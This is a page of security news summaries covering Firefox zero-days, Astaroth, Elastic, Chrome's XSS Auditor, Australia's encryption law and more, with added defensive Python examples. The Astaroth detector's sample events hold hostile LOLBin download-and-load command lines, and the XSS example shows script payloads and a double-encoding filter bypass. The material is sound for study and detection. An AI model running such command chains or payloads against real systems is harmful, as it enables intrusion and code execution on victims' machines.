Tech News - Security

470 Articles
A second zero-day found in Firefox was used to attack Coinbase employees; fix released in Firefox 67.0.4 and Firefox ESR 60.7.2

Bhagyashree R
21 Jun 2019
4 min read
Earlier this week, Mozilla fixed a zero-day vulnerability that was being actively exploited by attackers. It released another security update yesterday after the Coinbase Security team reported a second zero-day vulnerability in Firefox. The update has landed in Firefox 67.0.4 and Firefox ESR 60.7.2.

The two zero-day vulnerabilities

The first is a type confusion vulnerability tracked as CVE-2019-11707 that occurs “when manipulating JavaScript objects due to issues in Array.pop. This can allow for an exploitable crash.” It lets an attacker run attacker-controlled code inside Firefox’s sandboxed content process. The vulnerability was reported by both the Coinbase Security team and Samuel Groß, a security researcher with Google Project Zero; Groß had filed it on Bugzilla on April 15.

https://twitter.com/5aelo/status/1141273394723414016

Explaining its implications, Groß said, “the bug can be exploited for RCE [remote code execution] but would then need a separate sandbox escape to run code on an underlying operating system. However, most likely it can also be exploited for UXSS [universal cross-site scripting] which might be enough depending on the attacker’s goals.”

The second zero-day, assigned CVE-2019-11708, is described as “sandbox escape using Prompt:Open”. Chained with the first bug, this high-severity flaw lets malware escape Firefox’s protected content process and execute on the targeted host. “Insufficient vetting of parameters passed with the Prompt:Open IPC message between child and parent processes can result in the non-sandboxed parent process opening web content chosen by a compromised child process,” the advisory reads.

The Coinbase attack

Not much detail about these attacks and vulnerabilities was public until yesterday, when Philip Martin, Chief Information Security Officer at Coinbase, and his team disclosed that they had detected an attack targeting Coinbase employees. Coinbase also said that the attacker may have targeted other cryptocurrency organisations, and it is notifying the organisations it believes were targeted.

https://twitter.com/SecurityGuyPhil/status/1141466335592869888

Fortunately, the attack was detected before it could do any damage. Had it gone undetected, the attacker could have gained access to the Coinbase backend network and stolen funds from the exchange. In his tweets Martin also shared a number of Indicators of Compromise (IOCs) that defenders can use to check whether a system is affected.

https://twitter.com/SecurityGuyPhil/status/1141466339518767104

Vitali Kremez, a researcher who specialises in information security, malware hunting, carding and cybercrime intelligence, speculated that these IOCs were linked to a username “powercat”.

https://twitter.com/VK_Intel/status/1141540229951709184

Going by the IOCs, the attacker sent spear-phishing emails to lure victims to a web page hosting the exploit chain. If a victim opened that page in a vulnerable Firefox version, the page could download and install malware on their system without any further interaction.

The macOS backdoor attack

The attacker does not appear to have targeted only cryptocurrency organisations. Yesterday, Patrick Wardle, a macOS security researcher, published an analysis of a Mac malware sample sent to him by a user who said it had been installed on his fully updated Mac through the Firefox zero-day. Here is the email the attacker sent to that user:

[Image: the phishing email received by the user. Source: Objective-See]

The malware installed on the user’s system was called Finder.app; its hash exactly matched one of the hashes Martin had shared.

The news sparked a discussion on Hacker News, where many users found it unsettling that Mozilla took two months to ship a fix for a bug report of this severity. “Really, that Mozilla would let a reported RCE vulnerability simmer for two months until it bit someone would seem to reflect very poorly on their priorities and competence,” one user commented. Others were more interested in how Coinbase discovered the attack. One user commented, “I am more interested in how Coinbase employees discovered the attack. I am assuming nobody clicked the suspicious link and instead took it to a vm for reversing and analysis. It would have been game over if the exploit was actually executed on a non-sandboxed machine.”
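As a practical check against the builds named above, here is an added example (not from the article, Mozilla or Coinbase) in Python that decides whether a reported Firefox build carries both fixes. The point it makes is that the release and ESR branches must be compared separately: a naive numeric comparison would call ESR 60.7.2 older than 67.0.4 and therefore unpatched. It assumes version strings in the form printed by `firefox --version` (for example `Mozilla Firefox 60.7.2esr`) and treats any 60.x build as ESR even when the suffix is missing; both are assumptions of this example.

```python
import re

# Fixed builds named in the Mozilla advisory for CVE-2019-11707 / CVE-2019-11708.
FIXED_RELEASE = (67, 0, 4)
FIXED_ESR = (60, 7, 2)
ESR_MAJOR = 60  # assumption: the only ESR line shipping at the time was 60.x

VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?\s*(esr)?", re.IGNORECASE)


def parse_version(text):
    """Return ((major, minor, patch), is_esr) from a `firefox --version` line.

    A missing patch level is read as 0, so "67.0" compares as 67.0.0.
    Raises ValueError if no version number is present.
    """
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no Firefox version in {text!r}")
    major, minor = int(m.group(1)), int(m.group(2))
    patch = int(m.group(3)) if m.group(3) else 0
    # The "esr" suffix is authoritative; the major-number fallback is an assumption.
    is_esr = bool(m.group(4)) or major == ESR_MAJOR
    return (major, minor, patch), is_esr


def is_patched(text):
    """True if the build has both fixes, comparing within the right branch.

    Comparing an ESR build against FIXED_RELEASE would wrongly flag every
    60.x ESR as vulnerable, so the branch is chosen first.
    """
    version, is_esr = parse_version(text)
    return version >= (FIXED_ESR if is_esr else FIXED_RELEASE)


if __name__ == "__main__":
    for sample in ("Mozilla Firefox 67.0.3", "Mozilla Firefox 67.0.4",
                   "Mozilla Firefox 60.7.1esr", "Mozilla Firefox 60.7.2esr"):
        print(f"{sample:28} patched={is_patched(sample)}")
```

Feed it the output of `firefox --version` from an inventory tool; anything that returns False is a host to patch before it sees a phishing link.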

The EU Bounty Program enabled in VLC 3.0.7 release, this version fixed the most number of security issues

Vincy Davis
11 Jun 2019
2 min read
Last week, Jean-Baptiste Kempf, president of the VideoLAN non-profit organisation, released VLC 3.0.7, a minor update in the VLC 3.0.x branch. Kempf called the release “special” because it fixes more security issues than any other version of VLC. “This high number of security issues is due to the sponsoring of a bug bounty program funded by the European Commission, during the FOSSA program,” he wrote.

Last year, the European Commission announced that it would fund bug hunting for 14 open source projects it uses. As VLC media player is one of them, its bug bounty was sponsored by EU-FOSSA. Kempf told BleepingComputer that VideoLAN previously had “no money” to run a bug bounty, and that the EU-FOSSA sponsorship provided the “manpower” to find and fix the security bugs addressed in VLC 3.0.7.

According to the blog post, VLC 3.0.7 fixes 33 valid security issues: 2 of high severity, 21 of medium severity and 10 of low severity. Of the two high-severity issues, one is an out-of-bounds write in the faad2 library, a dependency of VLC, and the other is a stack buffer overflow in the RIST module of VLC 4.0. The medium-severity issues are mostly out-of-bounds reads, heap overflows, NULL-pointer dereferences and use-after-free bugs; the low-severity ones are mostly integer overflows, divisions by zero and further out-of-bounds reads.

Kempf also noted that the most successful hunter in the bounty program was ele7enxxh; BleepingComputer reports that ele7enxxh submitted a total of 13 bugs for $13,265.02.

Users are happy with this release because of the large number of security fixes and improvements in VLC 3.0.7.

https://twitter.com/evanderburg/status/1136600143707246592
https://twitter.com/alorandi/status/1137603867120734208

VLC users can download the latest version from the VideoLAN website.

Amazon’s Ring gave access to its employees to watch live footage of the customers, The Intercept reports

Amrata Joshi
11 Jan 2019
5 min read
According to a report by The Intercept, Ring, Amazon’s smart doorbell company, gave its employees access to live footage from customers’ cameras. As per the report, Ring engineers and executives were allowed to watch unfiltered footage of users. Amazon acquired Ring for $1 billion in February last year, and was itself in the news last year for a data breach in which customers’ email addresses were exposed.

Ring markets its doorbell-mounted cameras as a security measure that acts like a privatised neighbourhood watch while the user is away. Staff at Ring were reportedly able to access cameras both inside and outside the home, depending on where the devices were positioned. Ring has been accused of mishandling the videos the devices collect and of failing to protect the footage with encryption; according to The Intercept, a customer’s email address was all that was needed to gain access to the cameras in that customer’s home.

According to The Information and The Intercept, Ring’s video annotation team would watch camera footage and tag objects, humans and other things in the clips so that its object-recognition software could improve. In 2016, Ring gave its Ukraine-based research and development team unfettered access to a folder on Amazon’s S3 cloud storage service that held unencrypted videos recorded by Ring cameras.

Ring’s Neighbors app, which lets users receive real-time crime and safety alerts, makes no mention of image or facial recognition in its description, and neither Ring’s terms of service nor its privacy policy mention that videos are manually annotated by humans. Ring maintains that the videos were not shared by the company. Ring responded to this post stating, “We take the privacy and security of our customers’ personal information extremely seriously. In order to improve our service, we view and annotate certain Ring video recordings. These recordings are sourced exclusively from publicly shared Ring videos from the Neighbors app (in accordance with our terms of service), and from a small fraction of Ring users who have provided their explicit written consent to allow us to access and utilize their videos for such purposes. Ring employees do not have access to livestreams from Ring products. We have strict policies in place for all our team members. We implement systems to restrict and audit access to information. We hold our team members to a high ethical standard and anyone in violation of our policies faces discipline, including termination and potential legal and criminal penalties. In addition, we have zero tolerance for abuse of our systems and if we find bad actors who have engaged in this behavior, we will take swift action against them.”

https://twitter.com/briankrebs/status/1065219981833617408

Because of the privacy concerns, users are now sceptical about using Ring’s smart doorbell. One comment on Hacker News read, “The ring doorbell is installed at your front door. It records pretty much all movement to and from your house. It records audio at the doorstep, so if you're having a conversation with anyone at your doorstep, that gets recorded too.” Another user commented, “If some rando gets my ring doorbell footage and figures out where I live, that's hard to undo. If someone steals my stuff and gets away with it because I didn't have a ring doorbell, that's annoying but much easier to recover from. We are talking about the difference between an insurance claim and moving house.” A few users believe the device is prone to DDoS attacks. One of them commented, “Aside from the 700 person team given access to live video feeds and customer databases, the lack of proper security of this product makes it a PRIME target for DDOS attacks that could cripple infrastructure.”

Some users, however, are in favour of such devices, finding them safe and convenient to use. One user commented, “These devices are extremely popular in my neighborhood, and cost/convenience is the only thing keeping them from being universal.” Another user commented, “I'd say, yes. I've been able to watch that many people see the ring (they see the camera), and they back right off the porch. It's been awesome in this respect, people simply ring it less.”

Some users believe such surveillance devices should store data locally rather than in the cloud. Others are now looking at alternatives such as the Xiaomi Dafang camera, the RCA doorbell camera and Blue Iris. This news is a reminder of how home appliances can be monitored by companies or hackers and personal data might be misused.

Note: We have edited this news to include the response from the Ring team to our post.

Microsoft Defender ATP detects Astaroth Trojan, a fileless, info-stealing backdoor

Bhagyashree R
09 Jul 2019
3 min read
Yesterday, the Microsoft Defender Advanced Threat Protection (ATP) Research Team shared details of a fileless malware campaign in which attackers were loading the Astaroth Trojan directly into the memory of infected computers.

https://twitter.com/MsftSecIntel/status/1148262969710698498

Astaroth is a malware known for abusing living-off-the-land binaries (LOLBins) such as the Windows Management Instrumentation Command-line (WMIC) to steal sensitive information including credentials, keystrokes and other data. It sends the stolen data to a remote attacker, who can use it for financial theft or sell it in the cybercriminal underground. The trojan has been known since 2017 and has affected a number of European and Brazilian companies. Microsoft has not disclosed whether any other users’ machines were compromised in this campaign.

What are fileless threats?

Fileless malware either runs its payload directly in memory or abuses applications already installed on the system to carry out the attack. Because these attacks rely on legitimate programs, they are hard to detect for most security products and even for experienced security analysts. Andrea Lelli, a member of the Microsoft Defender ATP Research Team, argues that although these attacks are difficult to detect, they are certainly not undetectable. “There’s no such thing as the perfect cybercrime: even fileless malware leaves a long trail of evidence that advanced detection technologies in Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) can detect and stop,” he wrote in the blog post.

How is the Astaroth attack carried out?

During a standard review, Lelli noticed that telemetry showed a sudden increase in the use of the WMIC tool to run a script, which made him suspect a fileless attack. On further investigation, he found that the campaign was running the Astaroth backdoor directly in memory.

Here is how initial access and execution take place using only system tools:

[Diagram: the Astaroth attack chain. Source: Microsoft]

The attack begins with a spear-phishing email containing a malicious link that leads the user to an LNK file. When the user double-clicks the LNK file, it executes the WMIC tool with the /Format parameter, which downloads and runs JavaScript code; that code in turn downloads payloads by abusing the Bitsadmin tool. The downloaded payloads are Base64-encoded and are decoded with the Certutil tool. Two of them are decoded into plain DLL files, while the others remain encrypted. The Regsvr32 tool loads one of the decoded DLLs, which then decrypts and loads further files until the final payload, Astaroth, is injected into the Userinit process.

How does Microsoft Defender ATP detect and stop these attacks?

Microsoft Defender ATP uses several advanced technologies to “spot and stop a wide range of attacks.” From the cloud it draws on a metadata-based ML engine, a behavior-based ML engine, an AMSI-paired ML engine and a file classification engine, among others. On the client side it includes a memory scanning engine, an emulation engine, a network engine and more. Here is a diagram of the protection technologies in Microsoft Defender ATP:

[Diagram: Microsoft Defender ATP protection technologies. Source: Microsoft]

Check out the official post by the Microsoft Defender ATP Research Team for the full details.
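The chain above is unusually loud in process-creation telemetry, which is exactly what Lelli’s team keyed on. As an added example, not Microsoft’s code, the following Python sketches detection logic for it: each stage (WMIC with a remote /format stylesheet, Bitsadmin downloading over HTTP, Certutil decoding, Regsvr32 loading a DLL from a user-writable path, and a script host spawning any of these tools) is matched on its own, and a host is alerted only when several stages appear together, so that a lone `certutil -decode` run by an administrator does not page anyone. The event tuples are constructed for this example; the field layout, the 192.0.2.10 address and the file paths are assumptions.

```python
import re
from collections import defaultdict

# Constructed process-creation events: (host, parent image, command line).
# Written for this example; not real telemetry.
SAMPLE_EVENTS = [
    ("WS01", "explorer.exe", r"wmic.exe os get caption"),
    ("WS01", "cmd.exe", r"certutil.exe -verify C:\certs\corp.cer"),
    ("WS01", "msiexec.exe", r"regsvr32.exe /s C:\Windows\System32\scrrun.dll"),
    ("WS02", "explorer.exe", r'wmic.exe os get /format:"http://192.0.2.10/v.xsl"'),
    ("WS02", "wmic.exe", r"bitsadmin.exe /transfer job /download /priority high "
                         r"http://192.0.2.10/a.b C:\Users\Public\a.b"),
    ("WS02", "wmic.exe", r"certutil.exe -decode C:\Users\Public\a.b C:\Users\Public\a.dll"),
    ("WS02", "wmic.exe", r"regsvr32.exe /s C:\Users\Public\a.dll"),
    ("WS03", "cmd.exe", r"certutil.exe -decode C:\Users\alice\AppData\Local\Temp\c.txt "
                        r"C:\Users\alice\AppData\Local\Temp\c.bin"),
]

# One pattern per stage of the chain described in the article.
STAGES = [
    ("wmic_remote_xsl",        # WMIC /format pointing at an http(s) or UNC stylesheet
     re.compile(r'\bwmic(?:\.exe)?\b.*?/format\s*[:=]\s*"?\s*(?:https?://|\\\\)', re.I)),
    ("bitsadmin_download",     # BITS job fetching from a URL
     re.compile(r"\bbitsadmin(?:\.exe)?\b.*?/(?:transfer|addfile)\b.*?https?://", re.I)),
    ("certutil_decode",        # Base64 decode of a dropped payload
     re.compile(r"\bcertutil(?:\.exe)?\b.*?[-/]decode\b", re.I)),
    ("regsvr32_user_path",     # DLL loaded from a user-writable location
     re.compile(r"\bregsvr32(?:\.exe)?\b.*?\\(?:Users\\Public|AppData|Temp|ProgramData)\\", re.I)),
]
SCRIPT_HOSTS = {"wmic.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
LOLBIN_CHILDREN = ("bitsadmin", "certutil", "regsvr32")


def classify(cmdline, parent=None):
    """Return the list of stage labels a single event matches (possibly empty)."""
    hits = [name for name, pattern in STAGES if pattern.search(cmdline)]
    exe = cmdline.split()[0].lower() if cmdline.split() else ""
    # Parent/child relationship is a signal on its own: a script host
    # launching a download/decode/load tool is rarely legitimate.
    if parent and parent.lower() in SCRIPT_HOSTS and exe.startswith(LOLBIN_CHILDREN):
        hits.append("lolbin_spawned_by_script_host")
    return hits


def detect(events, min_stages=2):
    """Correlate stages per host; return {host: stages} for hosts reaching min_stages.

    Stages are kept in order of first appearance, which is useful for triage.
    """
    seen = defaultdict(list)
    for host, parent, cmdline in events:
        for stage in classify(cmdline, parent):
            if stage not in seen[host]:
                seen[host].append(stage)
    return {host: stages for host, stages in seen.items() if len(stages) >= min_stages}


if __name__ == "__main__":
    for host, stages in detect(SAMPLE_EVENTS).items():
        print(f"ALERT {host}: {' -> '.join(stages)}")
```

In the sample, WS01 runs the same tools for benign reasons and never matches; WS03 matches one stage and stays below the threshold; WS02 trips four stages plus the parent-process signal. The threshold is the knob to tune: lower it in a quiet environment, raise it where administrators script these tools routinely.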

Core security features of Elastic Stack are now free!

Amrata Joshi
21 May 2019
3 min read
Today, the team at Elastic announced that the core security features of the Elastic Stack are now free. They also announced the release of Elastic Stack versions 6.8.0 and 7.1.0 and the alpha release of Elastic Cloud on Kubernetes. With the free core security features, users can now define roles that protect index- and cluster-level access, encrypt network traffic, create and manage users, and fully secure Kibana with Spaces. The team opened the code for these features last year and has now made them free, which means users can run a fully secured cluster at no cost.

https://twitter.com/heipei/status/1130573619896225792

Release of Elastic Stack versions 6.8.0 and 7.1.0

Versions 6.8.0 and 7.1.0 of the Elastic Stack contain no new features; their purpose is to make the core security features free in the default distribution. These features include TLS for encrypted communications, the file and native realms for creating and managing users, and role-based access control over cluster APIs and indices. They also include multi-tenancy for Kibana through security for Kibana Spaces. Previously these features required a paid Gold subscription; they are now part of the free Basic tier.

Alpha release of Elastic Cloud on Kubernetes

The team also announced the alpha release of Elastic Cloud on Kubernetes (ECK), the official Kubernetes Operator for Elasticsearch and Kibana. It is a new product built on the Kubernetes Operator pattern that lets users provision, manage and operate Elasticsearch clusters on Kubernetes. It is designed to automate and simplify how Elasticsearch is deployed and operated in Kubernetes, and provides an official way of orchestrating Elasticsearch there with a SaaS-like experience for Elastic products and solutions.

Moving the core security features into the default distribution ensures that every cluster launched and managed by ECK is secured by default at creation time. Clusters deployed via ECK also include the free-tier capabilities such as Kibana Spaces, frozen indices for dense storage, Canvas, Elastic Maps and more, and users can monitor Kubernetes logs and infrastructure with the Elastic Logs and Elastic Infrastructure apps.

Some users think security should be built in rather than offered as an added feature. A user commented on Hacker News, “Security shouldn't be treated as a bonus feature.” Another user commented, “Security should almost always be a baseline requirement before something goes up for public sale.” Others are simply happy about the news. A user commented, “I know it's hard to make a buck with an open source business model but deciding to charge more for security-related features is always so frustrating to me. It leads to a culture of insecure deployments in environments when the business is trying to save money. Differentiate on storage or number of cores or something, anything but auth/security. I'm glad they've finally reversed this.”

To know more about this news, check out the blog post by Elastic.
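Making the features free does not turn them on: on these versions the default distribution still starts with security disabled unless `xpack.security.enabled` is set, and without transport TLS the node-to-node traffic stays in clear text. As an added example (not Elastic’s own code), the following Python shows a weak `elasticsearch.yml` beside a hardened one and a small audit that reports the settings that leave a cluster exposed. The keystore paths and the flat key-value parser are assumptions of this example; it is not a full YAML parser and only handles the dotted `key: value` lines Elasticsearch configuration normally uses.

```python
# Constructed configurations for this example.
WEAK_CONFIG = """
cluster.name: demo
# security left off, so anyone reaching 9200/9300 has full access
xpack.security.enabled: false
xpack.security.transport.ssl.verification_mode: none
"""

HARDENED_CONFIG = """
cluster.name: demo
xpack.security.enabled: true
xpack.security.transport.ssl.enabled: true
xpack.security.transport.ssl.verification_mode: full
xpack.security.transport.ssl.keystore.path: certs/node.p12   # assumed path
xpack.security.transport.ssl.truststore.path: certs/node.p12
xpack.security.http.ssl.enabled: true
xpack.security.http.ssl.keystore.path: certs/http.p12        # assumed path
"""

# (setting, value assumed when absent, acceptable values, why it matters)
CHECKS = [
    ("xpack.security.enabled", "false", {"true"},
     "security off: no authentication or role-based access control at all"),
    ("xpack.security.transport.ssl.enabled", "false", {"true"},
     "node-to-node traffic is unencrypted"),
    ("xpack.security.http.ssl.enabled", "false", {"true"},
     "REST traffic, including credentials, is sent in clear text"),
    ("xpack.security.transport.ssl.verification_mode", "full", {"full", "certificate"},
     "transport TLS does not verify peer certificates, so any node can join"),
]


def parse_flat_yaml(text):
    """Parse flat `dotted.key: value` lines; comments and blank lines are ignored.

    Nested blocks and lists are out of scope for this example (assumption).
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        key, value = line.split(":", 1)
        settings[key.strip()] = value.strip().strip("\"'")
    return settings


def audit(text):
    """Return one finding string per security setting that is missing or weak."""
    settings = parse_flat_yaml(text)
    findings = []
    for key, default, acceptable, why in CHECKS:
        value = settings.get(key, default).lower()
        if value not in acceptable:
            findings.append(f"{key}={value}: {why}")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"{label}: {len(audit(cfg))} finding(s)")
        for finding in audit(cfg):
            print("  -", finding)
```

Run the audit over every node’s config before first start: once `xpack.security.enabled` is true, the file and native realms and the role APIs described above become available, and the built-in users can be given passwords with `elasticsearch-setup-passwords`.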

Google plans to remove XSS Auditor used for detecting XSS vulnerabilities from its Chrome web browser

Amrata Joshi
19 Jul 2019
3 min read
As per a recent report by Naked Security, Google is planning to remove XSS Auditor, the built-in Chrome component designed to detect reflected cross-site scripting (XSS) attacks, from its Chrome web browser.

In an XSS attack, an attacker injects their own code into a legitimate website, either by adding malicious code to a legitimate URL (reflected XSS) or by posting content to a site that stores and displays what they have posted (persistent XSS). When someone views the page containing the injected code, it executes in their browser, which can be used to steal the victim’s session cookies or to deliver further malware.

XSS Auditor uses a blocklist to identify suspicious characters or HTML tags in request parameters and matches them against the page content, to spot attackers reflecting injected code into a page. Some developers have an issue with it because it does not catch all XSS vulnerabilities in a site, and bypasses for it are widely published online. XSS Auditor has also been criticised because attackers can abuse it: a crafted URL can make the Auditor disable a site’s own legitimate scripts, and its blocking behaviour has been used for cross-site information leaks. Patching the Auditor bypasses has also caused problems in Chrome itself. Google’s engineers changed XSS Auditor to filter out the offending code rather than block the page, but that was not enough, and they have finally decided to remove it.

Last year, while discussing the plan to remove XSS Auditor, Google senior security engineer Eduardo Vela Nava said, “We haven’t found any evidence the XSSAuditor stops any XSS, and instead we have been experiencing difficulty explaining to developers at scale, why they should fix the bugs even when the browser says the attack was stopped. In the past 3 months we surveyed all internal XSS bugs that triggered the XSSAuditor and were able to find bypasses to all of them.” In a Google Groups discussion, Google security engineer Thomas Sepez said, “Bypasses abound. It prevents some legit sites from working. Once detected, there’s nothing good to do. It introduces cross-site info leaks. Fixing all the info leaks has proven difficult.”

This raises the question of how web developers will check whether their sites are vulnerable without XSS Auditor. A feature sometimes mentioned as a replacement is an application programming interface (API) known as Trusted Types, which is in development. It treats user input as untrustworthy by default and requires developers to pass strings through a sanitising policy before they can be inserted into a web page. A user commented on Hacker News, “I'm working on the Trusted Types project in Google. To clarify, Trusted Types are not a replacement for XSS auditor. They are both related to XSS, but are fundamentally different and even target different flavors of XSS.”

According to a few users, the XSS Auditor was not that useful. Another comment reads, “Whilst the XSS auditor was able to protect against quite a wide range of payloads for reflected vulns, I think it caused more harm than good.”
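The point both Google engineers make, that a request-versus-response filter can only approximate what the server will do with the input, can be shown in a few lines. The following Python example, added here and not Chrome’s code, models the Auditor’s core idea (block when a tag-like request parameter reappears verbatim in the response) against a toy search page. The page decodes its `q` parameter a second time before reflecting it; that server-side transformation is assumed for the example and stands in for the many real ones that produced bypasses. The hardened variant escapes the value at output time, which is what actually fixes the bug, filter or no filter.

```python
import html
import re
from urllib.parse import parse_qsl, unquote

TAG = re.compile(r"<\s*/?\s*[a-z]", re.I)  # "looks like markup" heuristic


def render(query, hardened):
    """Reflect the `q` parameter into a results page.

    The app applies a second URL-decode (legacy quirk assumed for this
    example) before reflecting; that is the transformation the filter
    cannot see, because it compares against the once-decoded request.
    """
    params = dict(parse_qsl(query, keep_blank_values=True))
    q = unquote(params.get("q", ""))
    if hardened:
        q = html.escape(q, quote=True)  # contextual output encoding for HTML text
    return f"<h1>Results for {q}</h1>"


def auditor_blocks(query, body):
    """Reflected-XSS filter in the spirit of XSS Auditor.

    Block when a request parameter carries something tag-like and that exact
    string reappears in the response. The real Auditor was far more elaborate;
    only the request-vs-response matching idea is modelled here.
    """
    for _, value in parse_qsl(query, keep_blank_values=True):
        if TAG.search(value) and value in body:
            return True
    return False


def serve(query, hardened=False):
    """Return what the browser would get: blocked (empty body) or the page."""
    body = render(query, hardened)
    if auditor_blocks(query, body):
        return {"blocked": True, "body": ""}
    return {"blocked": False, "body": body}


def has_script(body):
    return "<script" in body.lower()


if __name__ == "__main__":
    plain = "q=%3Cscript%3Ealert(1)%3C/script%3E"          # <script>alert(1)</script>
    double = "q=%253Cscript%253Ealert(1)%253C/script%253E"  # %3Cscript%3E... after one decode
    for label, query in (("single-encoded", plain), ("double-encoded", double)):
        for hardened in (False, True):
            r = serve(query, hardened)
            print(f"{label:15} hardened={hardened!s:5} blocked={r['blocked']!s:5} "
                  f"script_in_page={has_script(r['body'])}")
```

The single-encoded payload is caught because the parameter and the reflected string match; the double-encoded one sails past because the parameter the filter sees contains no `<` at all, yet the page still executes it. With output escaping in place neither variant produces a script tag, and the filter has nothing to do.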
Lerna relicenses to ban major tech giants like Amazon, Microsoft, Palantir from using its software as a protest against ICE

Natasha Mathur
29 Aug 2018
3 min read
The Lerna team has taken a strong stand against the U.S. Immigration and Customs Enforcement (ICE) by modifying its MIT license to ban companies that have collaborated with ICE from using Lerna. Lerna is a tool for managing large-scale JavaScript projects with multiple packages; it lets you add dependencies to multiple packages with a single command, and it made monorepos available to everyone at a time when they were expensive and used only by big companies.

In a comment on GitHub earlier today, Lerna developer Jamie Kyle explained that he has been deeply disturbed by ICE’s treatment of immigrants in the United States, especially immigrant children, and wants it to stop. “The actions of ICE have had a lifelong lasting impact on these children, and many of them won't even remember it happening. I have trouble expressing how angry this makes me feel. And the worst part is that I feel helpless to improve the situation. There is one thing I have control over, and that's open source”, reads the post. Kyle states that major tech giants such as Facebook, Uber, Google, Amazon, etc., carry out “a lot of shady things behind the scenes. These companies care only about the millions of dollars that ICE is paying them and are willing to ignore all the horrible things that ICE does.” These companies also use Lerna, and “it's really hard for me to sit back and ignore what these companies are doing with my code”, says Kyle.

Reinforcing that stance, the updated Lerna license bans companies that are known collaborators with US Immigration and Customs Enforcement, such as Microsoft, Palantir and Amazon, among others, from using Lerna. These companies have no licensing rights, and “any use of Lerna will be considered theft”. They cannot pay for a license; if they wish to use Lerna, they need to publicly end their contracts with ICE. For everyone else, Lerna remains MIT licensed.

Public opinion about Lerna’s decision against ICE is varied:

https://twitter.com/AdrienDittrick/status/1034716993323184128
https://twitter.com/sarah_federman/status/1034633564065656832
https://twitter.com/_juandjara/status/1034716644667473921
https://twitter.com/stefanpenner/status/1034687675066970112

“Now, it's not news to me that people can use open source for evil. But it's really hard for me to sit back and ignore what these companies are doing with my code. It doesn't feel like there are enough steps in between me and the horrible things ICE is doing” says Kyle. For more information, check out the official GitHub post.

Australia’s Assistance and Access (A&A) bill, popularly known as the anti-encryption law, opposed by many including the tech community

Savia Lobo
10 Dec 2018
6 min read
Last week, Australia’s Assistance and Access (A&A) bill, widely known as the anti-encryption law, passed through Parliament. The law gives Australian police and government agencies the power to issue technical notices requiring tech companies to help law enforcement break into individuals’ encrypted data; using secret warrants, the government can even compel a company to serve malware remotely to a target’s device. The Labor party, which had planned to amend the legislation, withdrew its amendments in the Senate, and the bill passed even though Labor itself had called it flawed. The Australian Human Rights Commission wrote to Parliament, “The definition of ‘acts or things’ in the Bill is so vague as to potentially permit almost limitless forms of assistance”. Several lawmakers had looked set to reject the bill, criticising the government’s efforts to rush it through before the holiday.

The anti-encryption bill has been slammed by many. ProtonMail, a Swiss end-to-end encrypted email provider, has also condemned the new law in a blog post and said that it remains committed to protecting its users anywhere in the world, including in Australia.

ProtonMail against the Assistance and Access (A&A) law

Although ProtonMail has data centres only in Switzerland and is not under Australian jurisdiction, any request for assistance from Australian agencies under the A&A law would have to pass the scrutiny of Switzerland’s criminal procedure and data protection laws. According to ProtonMail, “just because this particular law does not affect ProtonMail and ProtonVPN does not mean we are indifferent. A&A is one of the most significant attacks on digital security and privacy since the NSA’s PRISM program. But the Australian measure is more brazen, hastily forced through Parliament over the loud objections of every sector of society, from businesses to lawyers groups.”

In a letter to Parliament, the Australian Computer Society, a trade association for IT professionals, outlined several problems with the law, including:

- Not every company has the technical know-how to safely implement malware that won’t accidentally backdoor the entire product (particularly with IoT devices), putting the security of people’s homes and organisations at risk.
- Businesses can’t easily plan or budget for possible covert surveillance work with the government.
- A companion “explanatory document” outlines some safeguards to protect civil rights and privacy that don’t actually appear in the law itself.
- Once police have gained access to a suspect’s device, they could easily remove evidence from the device that could prove the person’s innocence. There would be no way to know.

These are just a few of the issues, barely scratching the surface. According to ProtonMail, “the widespread use of encryption can actually further governments’ national security goals. It is critical that we strike the right balance. In our opinion, the A&A law does not do this, and in the long run, will make us all less safe.” To know more about this in detail, visit ProtonMail’s official blog post.

The tech community also opposes the Australian bill in an open letter

Members of the tech community also wrote an open letter to Bill Shorten and the Australian Labor party, titled “You bunch of Idiots!”. They write, “Every tech expert agrees that the so-called "Assistance and Access Bill" will do significant damage to Australia's IT industry.” The letter highlights three key points. First, the law weakens security for users: “We do not want to deliberately build backdoors or make our products insecure. This means everyone else's data will be vulnerable. People have an expectation that we protect their personal data to the best of our ability. We cannot continue to guarantee this unless we go against the technical capability notices issued by law enforcement - which will become a criminal offence”, according to the letter. Second, “You have made it harder for international companies to hire Australian talent, or have offices in Australia filled with Australian talent. Companies such as Amazon, Apple, Atlassian, Microsoft, Slack, Zendesk and others now have to view their Australian staff and teams as "potentially compromised". This is because law enforcement can force a person to build a backdoor and they cannot tell their bosses. They might sack them and leave Australia because of the law you just passed.” Third, “You have also just made it almost impossible to export Australian tech services because no-one wants a potentially vulnerable system that might contain a backdoor. Who in their right mind will buy a product like that? Look at the stock price of one of Australia's largest tech companies, Atlassian. It's down because of what you have voted for. In addition, because it violates the EU's General Data Protection Regulations (GDPR), you have just locked Australian companies and startups out of a huge market.”

The tech community strongly opposes the bill, calling it a destructive and short-sighted law: “In all good conscience, we can no longer support Labor. We will be advocating for people to choose those who protect digital rights.”

The ‘blackout’ move on GitHub to block Australia for everyone’s safety

After the Assistance and Access Bill passed, many Australian users suggested that the rest of the world block Australia for everyone’s safety. Following this, users created a repository on GitHub providing easy-to-use scripts to black out Australia, in solidarity with Australians who oppose the bill. On GNU/Linux, the main script periodically downloads a blocklist and updates the rules in a dedicated BLACKOUT chain in iptables. The repo also includes scripts to:

- set up a dedicated BLACKOUT chain in the iptables filter table and a privileged cron job that updates the iptables rules;
- stop any running cron job, remove it, and tear down the dedicated BLACKOUT chain.
iPhone can be hacked via a legit-looking malicious lightning USB cable worth $200, DefCon 27 demo shows

Savia Lobo
14 Aug 2019
5 min read
When our phones are running low on battery, we do not think twice before plugging in a USB cable to charge them. Likewise, when transferring files to and from other devices, we treat the simple wire as benign. Recently, in a demonstration at DefCon 27, a hacker going by the online handle MG showed an ordinary-looking iPhone USB Lightning cable fitted with “a small Wi-Fi-enabled implant, which, when plugged into a computer, lets a nearby hacker run commands as if they were sitting in front of the screen”, TechCrunch reports.

